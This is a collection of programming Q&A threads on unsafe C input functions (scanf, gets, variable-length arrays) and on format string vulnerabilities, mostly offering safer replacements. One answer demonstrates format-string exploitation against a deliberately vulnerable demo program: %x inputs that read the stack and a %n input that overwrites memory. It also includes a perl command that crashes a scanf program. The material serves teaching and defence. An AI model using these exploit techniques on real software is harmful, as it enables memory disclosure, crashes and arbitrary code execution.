scanf Cppcheck warning - c

Cppcheck shows the following warning for scanf:
Message: scanf without field width limits can crash with huge input data. To fix this error message add a field width specifier:
%s => %20s
%i => %3i
Sample program that can crash:
#include <stdio.h>
int main()
{
int a;
scanf("%i", &a);
return 0;
}
To make it crash:
perl -e 'print "5"x2100000' | ./a.out
I cannot crash this program typing "huge input data". What exactly should I type to get this crash? I also don't understand the meaning of the last line in this warning:
perl -e ...

The last line is an example command to run to demonstrate the crash with the sample program. It essentially causes perl to print "5" 2,100,000 times and pipes the result to the stdin of the program "a.out" (which is meant to be the compiled sample program).
First of all, scanf() should be used for testing only, not in real-world programs, because there are several situations it won't handle gracefully. For example, if you ask for "%i" and the user enters "12345abc", the "abc" stays in stdin and may be consumed by later input calls without giving the user a chance to change it.
Regarding this issue: scanf() will know it should read an integer value, however it won't know how long it can be. The pointer could point to a 16-bit integer, a 32-bit integer, a 64-bit integer or something even bigger (which it isn't aware of). Functions with a variable number of arguments (defined with ...) don't know the exact datatype of the elements passed, so they have to rely on the format string (which is why the format tags are not optional, unlike in C# where you just number them, e.g. "{0} {1} {2}"). And without a given length it has to assume some length, which might be platform dependent as well (making the function even more unsafe to use).
In general, consider it possibly harmful and a starting point for buffer overflow attacks. If you'd like to secure and optimize your program, start by replacing it with alternatives.
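One common alternative is to read a whole line with a bounded buffer and convert it with strtol(). The following is only a minimal sketch of that idea, not the one true replacement: the helper names parse_int and read_int and the 64-byte line limit are assumptions made for illustration.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: parse one line of text as an int.
 * Returns 1 on success, 0 if the text is not a clean, in-range integer. */
int parse_int(const char *line, int *out)
{
    char *end;
    long value;

    errno = 0;
    value = strtol(line, &end, 10);
    if (end == line)
        return 0;                    /* no digits at all */
    if (errno == ERANGE || value < INT_MIN || value > INT_MAX)
        return 0;                    /* does not fit in an int */
    if (*end != '\n' && *end != '\0')
        return 0;                    /* trailing junk such as "abc" */
    *out = (int)value;
    return 1;
}

/* Hypothetical helper: read one line from fp and parse it as an int. */
int read_int(FILE *fp, int *out)
{
    char line[64];                   /* assumed limit on the line length */

    if (fgets(line, sizeof line, fp) == NULL)
        return 0;                    /* end of file or read error */
    if (strchr(line, '\n') == NULL && !feof(fp))
        return 0;                    /* line longer than the buffer: reject it */
    return parse_int(line, out);
}
```

Calling read_int(stdin, &a) in place of scanf("%i", &a) never stores more than 64 bytes, however long the input is. A caller that wants to keep reading after an overlong line would still have to discard the rest of that line.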

I tried running the perl expression against the C program and it did crash here on Linux (segmentation fault).

Using scanf (or fscanf and sscanf) in real-world applications is usually not recommended: it is not safe, and it is a common source of buffer overruns when incorrect input data is supplied.
There are much more secure ways to read numbers in many commonly used C++ libraries (Qt, the runtime libraries for Microsoft Visual C++, etc.). You can probably find secure alternatives for "pure" C too.

Related

Creating a user length defined array in C

I'm trying to make an array with variable starting length to get a string. The code should count the words and adjust the size of the array, but this is only a test and I expose it here because I want to know if it's a good practice or one error. And if there is something I should know about, or I must have in mind.
Note, I talk about C, not C++
#include <stdio.h>
int main()
{ int c,b,count;
scanf("%d",&c);
count=c+1;
getchar();
char a[count];
for ( c=b=0 ; c!=count && b!='\n' ; c++ )
{
b=getchar();
a[c]=b;
}
a[c]='\0';
printf("%s",a); printf("%d",c-1);
}
I don't need change the size of the array at the execution time.
I was testing and I don't remember well why I'm using the c variable at first time instead of count directly, but I remember the first getchar was to flush the buffer, because it didn't work without the getchar.
I don't know why I need to put getchar. If I delete the getchar the program fails.
Anyway the program works fine. The first time you run, it expects a number with scanf and then expects the text.
If the text is larger than the size of the array the program will ignore it.
The number is the size of the array.
My questions are:
It is a good practice do a[variable] to do this job?
Why I need the getchar?
It will be portable? I mean, I don't know if some systems or standards don't accept this like some old C compilers or somewhat.
There are better methods?
It is a good practice do a[variable] to do this job?
It depends on someone's compiler configuration. It has been supported since C99. However since there's not a good reason to use it in such a simple program, use the standard malloc instead. Here's an in-depth discussion of the topic.
Why I need the getchar?
There's likely some input still buffered up in your terminal, and that first getchar is discarding it. Try printing the value out to the screen to see what it is; that might help you figure it out.
It will be portable?
See my answer to your first question. It will probably work on modern versions of gcc, but for example it doesn't work with Microsoft's C compiler (which is still basically on C89).
It is a good practice do a[variable] to do this job?
Where the size is determined by arbitrary user input without imposed limits, it is not good practice. A user could easily enter a very large value and overrun the stack.
Use either dynamic allocation, or check and coerce the input value to some sensible limit.
Also worth noting that VLAs are not supported in C++ or some C compilers, so the code lacks portability.
Why I need the getchar?
The user has to enter at least a newline for scanf() to return, but the %d format specifier does not consume non-digit characters, so the newline remains buffered. However, your code is easily broken by entering additional non-digit characters: for example, "16a<newline>" will assign 16 to c, the a will be discarded by getchar(), and the newline will be left buffered as before. A better solution is:
while( getchar() != '\n' ) {}
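One caveat with a loop of this kind: if input ends before a newline arrives (a closed pipe, or Ctrl-D on a terminal), getchar() keeps returning EOF and the loop never finishes. A small sketch that also stops on EOF could look like this; the function name discard_line is made up for the example.

```c
#include <stdio.h>

/* Hypothetical helper: consume the rest of the current line from fp.
 * Stops at the newline or at EOF, so it cannot spin forever on closed input. */
void discard_line(FILE *fp)
{
    int ch;

    while ((ch = getc(fp)) != '\n' && ch != EOF) {
        /* nothing to do: the character is simply dropped */
    }
}
```

In the program from the question, discard_line(stdin) would take the place of the single getchar() after scanf.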
It will be portable? I mean, I don't know if some systems or standards don't accept this like some old C compilers or somewhat.
Adoption of C99 VLAs is variable, and in C11 they are optional in any case.
There are better methods?
I hesitate to say "better", but safer and more flexible and portable ways sure. With respect to the array allocation, you could use malloc().
Using malloc or calloc would be a better choice in C
https://www.tutorialspoint.com/c_standard_library/c_function_malloc.htm
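To make the "dynamic allocation plus a sensible limit" advice concrete, here is a rough sketch. MAX_LEN and alloc_text are names invented for this example, and 4096 is an arbitrary bound, so adjust both to your program.

```c
#include <stdlib.h>

#define MAX_LEN 4096   /* assumed upper bound, chosen arbitrarily for the sketch */

/* Hypothetical helper: allocate a zeroed buffer for `requested` characters
 * plus the terminating '\0'. Returns NULL if the request is out of range
 * or if the allocation itself fails. The caller must free() the result. */
char *alloc_text(long requested)
{
    if (requested < 1 || requested > MAX_LEN)
        return NULL;
    return calloc((size_t)requested + 1, 1);
}
```

Unlike char a[count], a request that is too large (or negative) shows up as a NULL return that the program can check, rather than as a stack overrun.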

Replace deprecated gets()

I am using the SLM toolkit by CMU-Cambridge for some baseline language modeling on language data, but when I run one of the built executables, my system detects a buffer overflow when it tries to execute one of the commands.
Based on this StackOverflow question I noticed that __gets_chk+0x179 caused the problem, and I've found two occurrences of gets/fgets in the source code (evallm.c, also available in this GitHub project someone made) but I do not know how to fix them in a proper/secure way.
The relevant parts of the error message:
*** buffer overflow detected ***: /home/CMU-Cam_Toolkit_v2/bin/evallm terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__gets_chk+0x179)[0x7f613bc719e9]
Aborted
The broken code
# declaration of input string variable
char input_string[500];
# occurence 1
...
while (fgets (wlist_entry, sizeof (wlist_entry),context_cues_fp)) { ... }
...
# occurence 2
...
while (!feof(stdin) && !told_to_quit) {
printf("evallm : ");
gets(input_string);
....
The error basically occurred when the input_string I gave to the evallm command was too long. Normally it is to be called from the command line and you can interactively pass arguments. However, I piped all arguments together with the command (as seen in the example of the docs) but apparently sometimes my argument names were taking too many bytes. When I changed the array length of input_string from 500 to 2000 the problem was solved (so I guess the error was due to occurence 2). But I really would like to fix it by replacing gets() with getline() since it seems to be the right way to go. Or is replacing it with fgets() also a solution? If so, what parameters should I use?
However, when trying to replace gets(), I always get compiling errors. I'm not a C-programmer (Python, Java) and I'm not familiar with the syntax of getline(), so I'm struggling to find the right parameters.
In your particular case, you know that input_string is an array of 500 bytes. (Of course, you could replace that 500 with e.g. 2048)
I am paranoid, adept of defensive programming, and I would zero that buffer before any input, e.g.
memset(input_string, 0, sizeof(input_string));
So the buffer is cleared, even when fgets has failed. In most cases that is in principle useless. But you have corner cases and the devil is in the details.
So read documentation of fgets(3) and replace the gets call with
fgets(input_string, sizeof(input_string), stdin);
(you actually should handle corner cases, e.g. failure of fgets and input line longer than input_string ....)
Of course, you may want to zero the terminating newline. For that, add
size_t input_len = strlen(input_string);
if (input_len>0 && input_string[input_len-1] == '\n') input_string[input_len-1] = '\0';
(as commented, you might clear the input_string less often, e.g. at start and on fgets failure)
Notice that getline(3) is POSIX specific and is managing a heap-allocated buffer. Read about C dynamic memory allocation. If you are unfamiliar with C programming, that might be tricky to you. BTW, you could even consider using the Linux specific readline(3)
The main point is your familiarity with C programming.
NB: in C, # does not start a comment, but a preprocessor directive.
You replace gets with fgets.
It's almost that simple, the difference (besides the arguments) is that with fgets there might be a newline at the end of the buffer. (Note I say it might be there.)
I recommend this fgets reference.
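For the corner cases mentioned in these answers (fgets failing, a line longer than the buffer, a newline that may or may not be there), a wrapper along the following lines is one way to handle them. It is a sketch only: read_line and its return codes are invented here and are not part of the toolkit or of the C library.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: read one line into buf (capacity `size`).
 * Returns  1 for a complete line,
 *          0 if the line was too long and its tail was thrown away,
 *         -1 on end of file or read error.
 * The newline itself is never stored in buf. */
int read_line(FILE *fp, char *buf, size_t size)
{
    size_t len;
    int ch;

    if (size < 2 || fgets(buf, (int)size, fp) == NULL)
        return -1;

    len = strcspn(buf, "\n");
    if (buf[len] == '\n') {          /* the whole line fitted */
        buf[len] = '\0';
        return 1;
    }

    /* No newline stored: peek at what follows the part we read. */
    ch = getc(fp);
    if (ch == EOF || ch == '\n')
        return 1;                    /* last line, or an exact fit */

    /* Drop the rest of the long line so the next call starts fresh. */
    while ((ch = getc(fp)) != '\n' && ch != EOF) {
        /* discard */
    }
    return 0;
}
```

With this, gets(input_string) could become read_line(stdin, input_string, sizeof(input_string)), and the loop could stop when the result is -1 instead of testing feof(stdin).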

Why is it better to use `%s` to print a string using `printf` rather than printing it directly? [duplicate]

I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char text[1024];
static int some_value = -72;
strcpy(text, argv[1]); /* ignore the buffer overflow here */
printf("This is how you print correctly:\n");
printf("%s", text);
printf("This is how not to print:\n");
printf(text);
printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
return(0);
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAAXXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
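The counting behaviour of %n can be observed harmlessly, with a fixed format string and a pointer you own. This is only an illustration of how the stored value follows the output length and the field width; the function names are made up, and it assumes a C library that honours %n for literal format strings (glibc does, some hardened libraries do not).

```c
#include <stdio.h>

/* Returns the count that %n stores after `word` has been formatted. */
int count_after_word(const char *word)
{
    char out[64];
    int written = -1;

    snprintf(out, sizeof out, "%s%n", word, &written);
    return written;
}

/* Same idea, but the count is steered by a field width instead of the text. */
int count_after_padded_hex(int width)
{
    char out[64];
    int written = -1;

    snprintf(out, sizeof out, "%*x%n", width, 0xABu, &written);
    return written;
}
```

Here count_after_word("AAAA") yields 4 and count_after_padded_hex(8) yields 8, which is the same mechanism the exploit uses to choose the value it writes.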
There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
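For reference, this is what the legitimate use of the n$ notation looks like: the format string picks its arguments by position, so a translated message can reorder them. A small sketch, assuming a POSIX C library (ISO C alone does not define n$); swap_words is a name invented for the example.

```c
#include <stdio.h>

/* Formats two words in swapped order using POSIX positional arguments.
 * Returns what snprintf returns: the length of the full formatted text. */
int swap_words(char *out, size_t size, const char *first, const char *second)
{
    return snprintf(out, size, "%2$s %1$s", first, second);
}
```

Called as swap_words(buf, sizeof buf, "world", "hello"), it leaves "hello world" in buf. The danger described above arises only when the attacker, not the programmer, chooses the numbers.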
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.
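On the defensive side, the fix is the one from the Wikipedia quote in the question: user-supplied text is always passed as an argument to a fixed "%s", never as the format itself. A tiny sketch, with format_untrusted as a made-up name:

```c
#include <stdio.h>

/* Hypothetical helper: copy untrusted text into out as plain data.
 * Any %x, %s or %n inside `text` is kept as literal characters. */
int format_untrusted(char *out, size_t size, const char *text)
{
    return snprintf(out, size, "%s", text);
}
```

Given the input AAAA%08x.%n, the buffer ends up holding exactly those 11 characters; nothing is read from the stack and nothing is written through %n. Compiling with gcc's -Wformat-security flag also helps to spot calls such as printf(text).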

c : gets() and fputs() are dangerous functions?

In the computer lab at school we wrote a program using fputs and the compiler returned an error gets is a dangerous function to use and a similar error for fputs
but at home when i type in this bit of code:
#include <stdio.h>
main()
{
FILE *fp;
char name[20];
fp = fopen("name.txt","w");
gets(name);
fputs(name,fp);
fclose(fp);
}
i get no errors what so ever. The one at school was similar to this one, just a bit lengthy and having more variables.
I use codeblocks at home and the default gcc provided with fedora at school.
Could it be a problem with the compiler?
With gets you need to know exactly how many characters you will read, and use a large enough buffer accordingly. If the buffer is smaller than the input you read, you end up writing beyond the bounds of the allocated buffer, which results in undefined behavior and an invalid program.
Instead you should use fgets which allows you to specify how much data to read.
You don't get any errors because most likely your buffer name is big enough to hold the text you entered; if it were not, you would have a problem, and that is why the compiler issues the warning.
gets is certainly dangerous since there's no way to prevent buffer overflow.
For example, if your user entered 150 characters, that would almost certainly cause problems for your program. Use of scanf with an unbounded "%s" format specifier should also be avoided for input you have no control over.
However, the use of gets should not be an error since it complies with the standard. At most, it should be a warning (unless you, as the developer, configure something like "treat warnings as errors").
fputs is fine, not dangerous at all.
See here for a robust user input function, using fgets, which can be used to prevent buffer overflow.
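If you do keep a scanf-family call, the bounded form of "%s" looks like the sketch below. The width is one less than the buffer size so that the terminating '\0' still fits; first_word is a name made up for this example, and sscanf is used instead of scanf only so that the input can be shown inline.

```c
#include <stdio.h>

/* Hypothetical helper: copy the first whitespace-delimited word of `input`
 * into a 20-byte buffer. The width 19 leaves room for the terminator. */
int first_word(const char *input, char name[20])
{
    return sscanf(input, "%19s", name);
}
```

With a 26-letter input, only the first 19 letters are stored and name[19] is the terminator, so the 20-byte array from the question cannot be overrun.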
It would just be the different settings of the different compilers. Maybe the compiler that Codeblocks uses isn't as verbose or has warnings turned off.
Regardless of the compiler, gets is a dangerous function to use as it has no check for buffer overflow. Use fgets instead.
The other answers have all addressed gets, which is really and truly dangerous.
But the question also mentioned fputs. The fputs function is perfectly safe; it does not have these kinds of security concerns.
I believe the OP was probably mistaken in suggesting that the compiler had warned about fputs.
As for problems, there isn't any problem with any of the compilers. If you look at the link provided by Timothy Jones, you would understand why this warning is issued. As for different versions of compiler, compilers are configured differently to issue different levels of warning.
